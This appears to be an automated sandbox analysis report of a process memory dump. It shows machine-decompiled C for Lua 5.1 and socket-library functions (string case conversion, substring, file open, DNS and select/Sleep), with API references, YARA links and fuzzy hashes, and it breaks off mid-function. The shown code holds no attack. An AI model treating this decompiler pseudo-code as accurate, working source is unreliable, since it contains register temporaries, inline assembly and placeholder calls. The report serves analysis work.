Uniqueness Score: -1.00%

Function 00991350, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00991350(intOrPtr _a4) {
				intOrPtr _t3;

				_t3 = _a4;
				_push("dns");
				_push(_t3);
				L00994AD0();
				_push(0);
				_push(0);
				_push(_t3);
				L00994ACA();
				_push(0);
				_push(0x996070);
				_push(0);
				_push(_t3);
				L00994B48();
				_push(0xfffffffd);
				_push(_t3);
				L00994B42();
				return 0;
			}

0x00991351
0x00991355
0x0099135a
0x0099135b
0x00991360
0x00991362
0x00991364
0x00991365
0x0099136a
0x0099136c
0x00991371
0x00991373
0x00991374
0x00991379
0x0099137b
0x0099137c
0x00991387

APIs

lua_pushstring.LUA5.1(?,dns), ref: 0099135B
lua_createtable.LUA5.1(?,00000000,00000000,?,dns), ref: 00991365
luaL_openlib.LUA5.1(?,00000000,00996070,00000000,?,00000000,00000000,?,dns), ref: 00991374
lua_settable.LUA5.1(?,000000FD,?,00000000,00996070,00000000,?,00000000,00000000,?,dns), ref: 0099137C

Strings

dns, xrefs: 00991355

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_openlib.lua_createtable.lua_pushstring.lua_settable.
String ID: dns
API String ID: 1217499678-2196626497
Opcode ID: 54e95fd9ec603d6ee7d1e54a8c97c0e4abf61d6bd374d3cfc29e12957975e9e5
Instruction ID: 5d9410171a1ef7363c938acaeeec85a709740f4641dd4486217f6b47a8e5b7bf
Opcode Fuzzy Hash: 54e95fd9ec603d6ee7d1e54a8c97c0e4abf61d6bd374d3cfc29e12957975e9e5
Instruction Fuzzy Hash: 60D092316CA62035ECA2763D2C43F8E51484FDABA5F250200F611760C1DA88B65312EE

Uniqueness

Uniqueness Score: -1.00%

Function 10015640, Relevance: 7.6, APIs: 5, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10015640(void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				char _v272;
				char _v276;
				intOrPtr _v280;
				void* __ebp;
				void* _t23;
				void* _t28;
				intOrPtr _t33;
				void* _t35;
				char _t36;
				void* _t38;

				_t45 = __fp0;
				_t40 = __eflags;
				_t33 = _a4;
				_t36 = E100016F0(__eflags, _t33, 0xffffd8ed,  &_v276);
				_v280 = E100016F0(_t40, _t33, 0xffffd8ec, 0);
				_v264 = _t33;
				_v272 = _t36;
				_v268 = _v276 + _t36;
				_t35 = E10001670(_t40, __fp0, _t33, 0xffffd8eb) + _t36;
				_t38 =  &_v280 + 0x20;
				if(_t35 > _v268) {
					L3:
					return 0;
				} else {
					while(1) {
						_push(_v280);
						_push(_t35);
						_push( &_v272);
						_v260 = 0;
						_t28 = E10014B40();
						_t38 = _t38 + 0xc;
						if(_t28 != 0) {
							break;
						}
						_t35 = _t35 + 1;
						if(_t35 <= _v268) {
							continue;
						} else {
							goto L3;
						}
						goto L7;
					}
					_t23 = _t28 - _t36;
					__eflags = _t28 - _t35;
					if(_t28 == _t35) {
						_t23 = _t23 + 1;
						__eflags = _t23;
					}
					_push(_t23);
					E10001910(_t45, _t33);
					E10001300(_t33, 0xffffd8eb);
					return E100154F0(_t36, _t45,  &_v272, _t35, _t28);
				}
				L7:
			}

0x10015640
0x10015640
0x1001564e
0x10015669
0x1001567c
0x10015680
0x10015684
0x10015688
0x10015697
0x10015699
0x1001569e
0x100156cd
0x100156d6
0x100156a0
0x100156a0
0x100156a8
0x100156a9
0x100156aa
0x100156ab
0x100156b8
0x100156ba
0x100156bf
0x00000000
0x00000000
0x100156c5
0x100156c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100156c8
0x100156d9
0x100156db
0x100156dd
0x100156df
0x100156df
0x100156df
0x100156e0
0x100156e2
0x100156ed
0x1001570b
0x1001570b
0x00000000

APIs

lua_tolstring.LUA5.1(?,FFFFD8ED,?), ref: 1001565C
lua_tolstring.LUA5.1(?,FFFFD8EC,00000000,?,FFFFD8ED,?), ref: 1001566B
lua_tointeger.LUA5.1(?,FFFFD8EB,?,FFFFD8EC,00000000,?,FFFFD8ED,?), ref: 1001568C
lua_pushinteger.LUA5.1(?,00000000,?,00000000,?), ref: 100156E2
lua_replace.LUA5.1(?,FFFFD8EB,?,00000000,?,00000000,?), ref: 100156ED

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_tolstring.$lua_pushinteger.lua_replace.lua_tointeger.
String ID:
API String ID: 3687203914-0
Opcode ID: 9b9099412adb33e1795d61356204cf11d4786e998d72e3192ad48321a41679f3
Instruction ID: 391f80fc55185fb3427af442a19285bd6352e9dc41740b0b20e76bb7fb7d2b3d
Opcode Fuzzy Hash: 9b9099412adb33e1795d61356204cf11d4786e998d72e3192ad48321a41679f3
Instruction Fuzzy Hash: 0A1106756082056BD310DEA8DC81EEFB7ECDBC12D0F44093DF94497211E676E84987E2

Uniqueness

Uniqueness Score: -1.00%

Function 10014420, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014420(void* __eflags, void* __fp0, char _a4) {
				intOrPtr _t13;
				void* _t21;
				intOrPtr _t23;
				void* _t26;

				_t35 = __eflags;
				_t25 = _a4;
				_t21 = E1000F4A0(__eflags, _a4, 1,  &_a4);
				_t26 = E100144C0(E1000F5C0(__eflags, __fp0, _a4, 2), _a4);
				_t13 = E100144C0(E1000F600(_t35, __fp0, _t25, 3, 0xffffffff), _a4);
				if(_t26 < 1) {
					_t26 = 1;
				}
				_t23 = _a4;
				if(_t13 > _t23) {
					_t13 = _t23;
				}
				if(_t26 > _t13) {
					E10001930(_t25, 0x1001ab10, 0);
					return 1;
				} else {
					_t7 = _t21 - 1; // -1
					E10001930(_t25, _t26 + _t7, _t13 - _t26 + 1);
					return 1;
				}
			}

0x10014420
0x10014427
0x1001443b
0x10014456
0x10014467
0x10014472
0x10014474
0x10014474
0x10014479
0x1001447f
0x10014481
0x10014481
0x10014485
0x100144aa
0x100144ba
0x10014487
0x1001448b
0x10014491
0x100144a1
0x100144a1

APIs

luaL_checklstring.LUA5.1(?,00000001,?), ref: 1001442F

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_checkinteger.LUA5.1(?,00000002,?), ref: 10014441

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

luaL_optinteger.LUA5.1(?,00000003,000000FF,?,?,?,?,?), ref: 1001445E

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

lua_pushlstring.LUA5.1(?,-00000001,00000001,?,?,?,?,?,?,?,?,?), ref: 10014491
lua_pushlstring.LUA5.1(?,1001AB10,00000000,?,?,?,?,?,?,?,?,?), ref: 100144AA

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushlstring.$L_checkinteger.L_checklstring.L_optinteger.S_newlstr.lua_isnumber.lua_tointeger.lua_tolstring.lua_type.
String ID:
API String ID: 3601105028-0
Opcode ID: 9145638a95639f900bc761f7749f505c4e4ec9b6157bffadb820cffd7cd070a5
Instruction ID: 2e7c2011c372aaaa604ac61816d20ef8f691f963a366e44801d2b6c2795ee369
Opcode Fuzzy Hash: 9145638a95639f900bc761f7749f505c4e4ec9b6157bffadb820cffd7cd070a5
Instruction Fuzzy Hash: 3601F9BAA001012BE200D554BCC2FBF735CC7C1665F050539F954DB287E662FD9512E2

Uniqueness

Uniqueness Score: -1.00%

Function 10014580, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10014580(void* __ebx, void* __eflags, intOrPtr _a4) {
				char _v0;
				char _v524;
				intOrPtr _v528;
				char _t21;
				intOrPtr* _t26;
				void* _t37;
				void* _t38;
				void* _t39;

				_t38 =  &_v528;
				E1000F4A0(__eflags, _a4, 1, _t38);
				E1000FC00(_a4,  &_v524);
				_t39 = _t38 + 0x14;
				_t37 = 0;
				if(_v528 > 0) {
					_t26 = __imp__tolower;
					do {
						_t43 = _v524 -  &_v0;
						if(_v524 >=  &_v0) {
							E1000F9E0(_t43,  &_v524);
							_t39 = _t39 + 4;
						}
						_t21 =  *_t26(0);
						_t39 = _t39 + 4;
						 *_v524 = _t21;
						_t37 = _t37 + 1;
						_v524 = _v524 + 1;
					} while (_t37 < _v528);
				}
				E1000FB40( &_v524);
				return 1;
			}

0x10014580
0x10014597
0x100145a4
0x100145ad
0x100145b0
0x100145b4
0x100145b7
0x100145bd
0x100145c8
0x100145ca
0x100145d1
0x100145d6
0x100145d6
0x100145df
0x100145e5
0x100145e8
0x100145f3
0x100145f4
0x100145f8
0x100145fc
0x10014602
0x10014617

APIs

luaL_checklstring.LUA5.1(?,00000001), ref: 10014597

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_buffinit.LUA5.1(?,?,?,00000001), ref: 100145A4
luaL_prepbuffer.LUA5.1(?), ref: 100145D1
tolower.MSVCRT ref: 100145DF
luaL_pushresult.LUA5.1(?), ref: 10014602

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_buffinit.L_checklstring.L_prepbuffer.L_pushresult.lua_tolstring.tolower
String ID:
API String ID: 2415281170-0
Opcode ID: 024cece5911bf815da7eb73de44e97dffbeb1861dedc2a530efcc8cbb2c83cd0
Instruction ID: 8656b9c518a23027cf3c859489ce47ba86e9b29e8775c7a9dc4201707695f6d0
Opcode Fuzzy Hash: 024cece5911bf815da7eb73de44e97dffbeb1861dedc2a530efcc8cbb2c83cd0
Instruction Fuzzy Hash: F901C4755043515BD710DB68D8C1DABB3E9EF94340F45482DF89587202EB30E94A87A3

Uniqueness

Uniqueness Score: -1.00%

Function 10014620, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10014620(void* __ebx, void* __eflags, intOrPtr _a4) {
				char _v0;
				char _v524;
				intOrPtr _v528;
				char _t21;
				intOrPtr* _t26;
				void* _t37;
				void* _t38;
				void* _t39;

				_t38 =  &_v528;
				E1000F4A0(__eflags, _a4, 1, _t38);
				E1000FC00(_a4,  &_v524);
				_t39 = _t38 + 0x14;
				_t37 = 0;
				if(_v528 > 0) {
					_t26 = __imp__toupper;
					do {
						_t43 = _v524 -  &_v0;
						if(_v524 >=  &_v0) {
							E1000F9E0(_t43,  &_v524);
							_t39 = _t39 + 4;
						}
						_t21 =  *_t26(0);
						_t39 = _t39 + 4;
						 *_v524 = _t21;
						_t37 = _t37 + 1;
						_v524 = _v524 + 1;
					} while (_t37 < _v528);
				}
				E1000FB40( &_v524);
				return 1;
			}

0x10014620
0x10014637
0x10014644
0x1001464d
0x10014650
0x10014654
0x10014657
0x1001465d
0x10014668
0x1001466a
0x10014671
0x10014676
0x10014676
0x1001467f
0x10014685
0x10014688
0x10014693
0x10014694
0x10014698
0x1001469c
0x100146a2
0x100146b7

APIs

luaL_checklstring.LUA5.1(?,00000001), ref: 10014637

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_buffinit.LUA5.1(?,?,?,00000001), ref: 10014644
luaL_prepbuffer.LUA5.1(?), ref: 10014671
toupper.MSVCRT ref: 1001467F
luaL_pushresult.LUA5.1(?), ref: 100146A2

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_buffinit.L_checklstring.L_prepbuffer.L_pushresult.lua_tolstring.toupper
String ID:
API String ID: 4013154477-0
Opcode ID: e218d2ba4caca59dc7ce08949bea6e48a152302a623694942cf9ab9ccf19795d
Instruction ID: aa02203b80b58980868e1199d71efe31b64802ab187f40ff1803c728430bf6be
Opcode Fuzzy Hash: e218d2ba4caca59dc7ce08949bea6e48a152302a623694942cf9ab9ccf19795d
Instruction Fuzzy Hash: 3E01C0B55043519BE710DB28D8C1DABB3E8FF95344F05482DF89487201EB70E94A87E3

Uniqueness

Uniqueness Score: -1.00%

Function 009936B0, Relevance: 7.6, APIs: 5, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E009936B0(long long __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t17;
				intOrPtr _t20;
				intOrPtr _t24;
				signed int _t25;
				void* _t27;
				long long* _t28;
				long long* _t29;
				long long _t34;

				_t34 = __fp0;
				_t27 = (_t25 & 0xfffffff8) - 0xc;
				_t11 = _a12;
				_t20 = 0;
				if(_t11 > 0) {
					_t17 = _a20;
					_t24 = _a4;
					do {
						_t12 = _a8;
						_push(_t12);
						_push(_t20);
						L00994A40();
						if(_t12 != 0) {
							_t28 = _t27 - 8;
							_a24 = _a24 + 1;
							asm("fild dword [ebp+0x1c]");
							 *_t28 = _t34;
							_push(_t24);
							L00994B5A();
							_v20 = _t20;
							_v16 = 0;
							asm("fild qword [esp+0x1c]");
							_t29 = _t28 + 4;
							 *_t29 = _t34;
							_push(_t24);
							L00994B5A();
							_push(_a16);
							_push(_t24);
							L00994B00();
							_push(_t17);
							_push(_t24);
							L00994B42();
							_t27 = _t29 + 0x1c;
						}
						_t11 = _a12;
						_t20 = _t20 + 1;
					} while (_t20 < _t11);
				}
				return _t11;
			}

0x009936b0
0x009936b6
0x009936b9
0x009936bf
0x009936c3
0x009936c5
0x009936c8
0x009936cb
0x009936cb
0x009936ce
0x009936cf
0x009936d0
0x009936d7
0x009936dc
0x009936e0
0x009936e3
0x009936e6
0x009936e9
0x009936ea
0x009936ef
0x009936f3
0x009936fb
0x009936ff
0x00993702
0x00993705
0x00993706
0x0099370e
0x0099370f
0x00993710
0x00993715
0x00993716
0x00993717
0x0099371c
0x0099371c
0x0099371f
0x00993722
0x00993723
0x009936cb
0x0099372d

APIs

__WSAFDIsSet.WSOCK32(00000000,00000000), ref: 009936D0
lua_pushnumber.LUA5.1(?,?,00000001,00000000,?,?), ref: 009936EA
lua_pushnumber.LUA5.1(?,?,?,00000001,00000000,?,?), ref: 00993706
lua_gettable.LUA5.1(?,?,?,?,?,00000001,00000000,?,?), ref: 00993710
lua_settable.LUA5.1(?,00000000,?,?,?,?,?,00000001,00000000,?,?), ref: 00993717

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_gettable.lua_settable.
String ID:
API String ID: 892425177-0
Opcode ID: a00f43078a4ce57c56e84f79f639fee7fe4558a4a20bde255f67cd6488ac6503
Instruction ID: ac805de424d37914cfa80fedfe6a326f2603e263b4f04a19dee9fadc2b122a1e
Opcode Fuzzy Hash: a00f43078a4ce57c56e84f79f639fee7fe4558a4a20bde255f67cd6488ac6503
Instruction Fuzzy Hash: 150175715046095BCB01BF6DDC41EAF77ACEF84354F004154FDA487241DB35DA278BAA

Uniqueness

Uniqueness Score: -1.00%

Function 10012430, Relevance: 7.6, APIs: 5, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012430(void* __eflags, void* __fp0, intOrPtr _a4) {
				void* __ebx;
				void* _t2;
				char* _t3;
				struct _IO_FILE** _t4;
				struct _IO_FILE* _t5;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = _a4;
				_t2 = E10001410(__eflags, _a4, 1);
				_t20 = _t19 + 8;
				_t26 = _t2;
				if(_t2 > 0) {
					_t3 = E1000F4A0(__eflags, _t18, 1, 0);
					_t16 = _t3;
					_t4 = E100121F0(_t18);
					_t13 = _t4;
					_t5 = fopen(_t3, "r");
					_t21 = _t20 + 0x18;
					 *_t4 = _t5;
					__eflags = _t5;
					if(_t5 == 0) {
						E10012380(_t5, _t13, _t18, 1, _t16);
						_t21 = _t21 + 0xc;
					}
					E10012400(_t18, E10001150(_t18), 1);
					return 1;
				} else {
					E10001C30(_t26, __fp0, _t18, 0xffffd8ef, 1);
					return E100123E0(_t26, __fp0, _t18);
				}
			}

0x10012431
0x10012438
0x1001243d
0x10012440
0x10012442
0x10012463
0x10012469
0x1001246b
0x10012476
0x10012478
0x1001247e
0x10012481
0x10012483
0x10012485
0x1001248b
0x10012490
0x10012490
0x100124a0
0x100124b0
0x10012444
0x1001244c
0x1001245b
0x1001245b

APIs

lua_type.LUA5.1(?,00000001), ref: 10012438
lua_rawgeti.LUA5.1(?,FFFFD8EF,00000001), ref: 1001244C
luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 10012463
fopen.MSVCRT ref: 10012478
lua_gettop.LUA5.1(?,00000001), ref: 10012496

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.fopenlua_gettop.lua_rawgeti.lua_type.
String ID:
API String ID: 2279767898-0
Opcode ID: 0b8743dbec81a24e4825ef5e278f63bea946f713c7ecf149b41be6310776a458
Instruction ID: c38ee4ca88316d95675d580ecdb45d18d6d857f121b5e4bb0cb585be7e4d32bb
Opcode Fuzzy Hash: 0b8743dbec81a24e4825ef5e278f63bea946f713c7ecf149b41be6310776a458
Instruction Fuzzy Hash: FFF09CBA95162133FA1162287C43FCF254DCF52798F050020F604BE187F6A5F7E601EA

Uniqueness

Uniqueness Score: -1.00%

Function 00991440, Relevance: 7.5, APIs: 5, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00991440(void* __eax, void* __eflags, long long __fp0, char _a4) {
				intOrPtr* _v0;
				void* _t8;
				intOrPtr* _t9;
				char _t20;

				_t20 = _a4;
				_push(0);
				_push(1);
				_push(_t20);
				L00994B54();
				_a4 = 0;
				_t8 = E00991400(__eflags, __eax,  &_a4);
				_t19 = _t8;
				if(_t8 == 0) {
					_t9 =  *((intOrPtr*)(_a4 + 0xc));
					_push( *((intOrPtr*)( *_t9)));
					L00994A10();
					_push(_t9);
					_push(_t20);
					L00994AD0();
					E00991650(_v0, __fp0, _t20, _v0);
					return 2;
				} else {
					_push(_t20);
					L00994B4E();
					_push(E009946E0(_t19));
					_push(_t20);
					L00994AD0();
					return 2;
				}
			}

0x00991441
0x00991446
0x00991448
0x0099144a
0x0099144b
0x00991454
0x0099145e
0x00991463
0x0099146a
0x0099148e
0x00991495
0x00991496
0x0099149b
0x0099149c
0x0099149d
0x009914a8
0x009914b7
0x0099146c
0x0099146c
0x0099146d
0x00991478
0x00991479
0x0099147a
0x00991489
0x00991489

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 0099144B
lua_pushnil.LUA5.1(?), ref: 0099146D
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 0099147A
inet_ntoa.WSOCK32(?), ref: 00991496
lua_pushstring.LUA5.1(?,00000000,?), ref: 0099149D

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$L_checklstring.inet_ntoalua_pushnil.
String ID:
API String ID: 88720175-0
Opcode ID: f71ae4ee8f35149a87f7c96aff14bfc64f5b2a8a6e25cbf535af88eddc49cc57
Instruction ID: 3b0a8741fbaa1c6a0b9f496d9eac8633a3c0d393d19162090a4461f68968f1d1
Opcode Fuzzy Hash: f71ae4ee8f35149a87f7c96aff14bfc64f5b2a8a6e25cbf535af88eddc49cc57
Instruction Fuzzy Hash: D6F0AFB56052112BEA02FA2CEC42FAFB39CEFC9354F144458F80197253D678E94786EA

Uniqueness

Uniqueness Score: -1.00%

Function 100146C0, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100146C0(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v524;
				intOrPtr _v528;
				void* _t14;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;

				_t23 =  &_v528;
				_t19 = _a4;
				_t14 = E1000F4A0(__eflags, _a4, 1, _t23);
				_t20 = E1000F5C0(__eflags, __fp0, _a4, 2);
				E1000FC00(_t19,  &_v524);
				_t24 = _t23 + 0x1c;
				_t21 = _t20 - 1;
				if(_t20 > 0) {
					_t22 = _t21 + 1;
					do {
						E1000FAC0( &_v524, _t14, _v528);
						_t24 = _t24 + 0xc;
						_t22 = _t22 - 1;
					} while (_t22 != 0);
				}
				E1000FB40( &_v524);
				return 1;
			}

0x100146c0
0x100146cd
0x100146e0
0x100146eb
0x100146ef
0x100146f4
0x100146f9
0x100146fc
0x100146fe
0x100146ff
0x1001470a
0x1001470f
0x10014712
0x10014712
0x100146ff
0x1001471a
0x10014730

APIs

luaL_checklstring.LUA5.1(?,00000001), ref: 100146D8

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_checkinteger.LUA5.1(?,00000002,?,00000001), ref: 100146E2

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

luaL_buffinit.LUA5.1(?,?,?,00000002,?,00000001), ref: 100146EF
luaL_addlstring.LUA5.1(?,00000000,?), ref: 1001470A

Part of subcall function 1000FAC0: luaL_prepbuffer.LUA5.1(?,?,00000000,?,?,1000FB2D,?,?,?,?,1000F8CA,?,?), ref: 1000FAE5

luaL_pushresult.LUA5.1(?), ref: 1001471A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_addlstring.L_buffinit.L_checkinteger.L_checklstring.L_prepbuffer.L_pushresult.lua_isnumber.lua_tointeger.lua_tolstring.
String ID:
API String ID: 2505501650-0
Opcode ID: dd5380a8d918d5b8c240988544aa195298b1a548add2beebdd0a94509ed2034c
Instruction ID: 78559fe0664be6828c5f7a6f9c949e5784c58d9458450df14d03adf4bddf0565
Opcode Fuzzy Hash: dd5380a8d918d5b8c240988544aa195298b1a548add2beebdd0a94509ed2034c
Instruction Fuzzy Hash: AEF0F6B9A002006BF310D614EC82FBB72ECEBD4794F48482DBD4482246F674FD0952F2

Uniqueness

Uniqueness Score: -1.00%

Function 00994130, Relevance: 7.5, APIs: 5, Instructions: 41
sleepCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00994130(void* __fp0, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _t10;
				long _t11;
				intOrPtr* _t12;
				intOrPtr _t13;
				void* _t17;
				intOrPtr* _t18;

				_t10 = E00992D00(_a20, _a20);
				_t18 = _t17 + 4;
				L00994BD0();
				 *_t18 = _t10;
				asm("fild dword [esp]");
				asm("fsubr st0, st1");
				L00994BD0();
				_v4 = _t10;
				_t11 = _a4;
				if(_t11 > 0) {
					asm("fcomp qword [0x995168]");
					asm("fnstsw ax");
					if((_t11 & 0x00000001) != 0) {
						_t12 = 0;
					} else {
						_t12 = _t18;
					}
					_push(_t12);
					_t13 = _a8;
					_push(_a16);
					_push(_a12);
					_push(_t13);
					_push(0);
					L00994A58();
					return _t13;
				} else {
					L00994BD0();
					Sleep(_t11);
					return 0;
				}
			}

0x00994138
0x0099413f
0x00994142
0x00994147
0x0099414b
0x0099414f
0x00994157
0x0099415c
0x00994160
0x00994166
0x00994180
0x00994186
0x0099418b
0x00994193
0x0099418d
0x0099418d
0x0099418d
0x0099419d
0x0099419e
0x009941a2
0x009941a3
0x009941a4
0x009941a5
0x009941a7
0x009941af
0x00994168
0x0099416e
0x00994174
0x0099417f
0x0099417f

APIs

_ftol.MSVCRT ref: 00994142
_ftol.MSVCRT ref: 00994157
_ftol.MSVCRT ref: 0099416E
Sleep.KERNEL32(00000000,?,00000000,BFF00000), ref: 00994174
select.WSOCK32(00000000,?,?,?,00000000), ref: 009941A7

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftol$Sleepselect
String ID:
API String ID: 1151169303-0
Opcode ID: 5eb5ca3fd17f2ad9448cc8a8756e331fc1e9b7d9c2ea9af87517106ec582f92e
Instruction ID: d4ae36c5d020d5ee584f59a9e897c8b4b14527d7c34273d5853b235add93428c
Opcode Fuzzy Hash: 5eb5ca3fd17f2ad9448cc8a8756e331fc1e9b7d9c2ea9af87517106ec582f92e
Instruction Fuzzy Hash: 6F016DB0A1C200BBEB12EB68ED06F1B77E8FBD4715F514829F484D2250E634D859DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1000FCD0, Relevance: 7.5, APIs: 5, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000FCD0(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t6;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t17;
				void* _t19;
				void* _t24;

				_t24 = __fp0;
				_t12 = _a12;
				if(_t12 < 0) {
					return _t6;
				}
				_t17 = _a8;
				_t14 = _a4;
				if(_t17 <= 0) {
					_t23 = _t17 - 0xffffd8f0;
					if(_t17 > 0xffffd8f0) {
						_t11 = E10001150(_t14);
						_t19 = _t19 + 4;
						_t17 = _t17 + _t11 + 1;
					}
				}
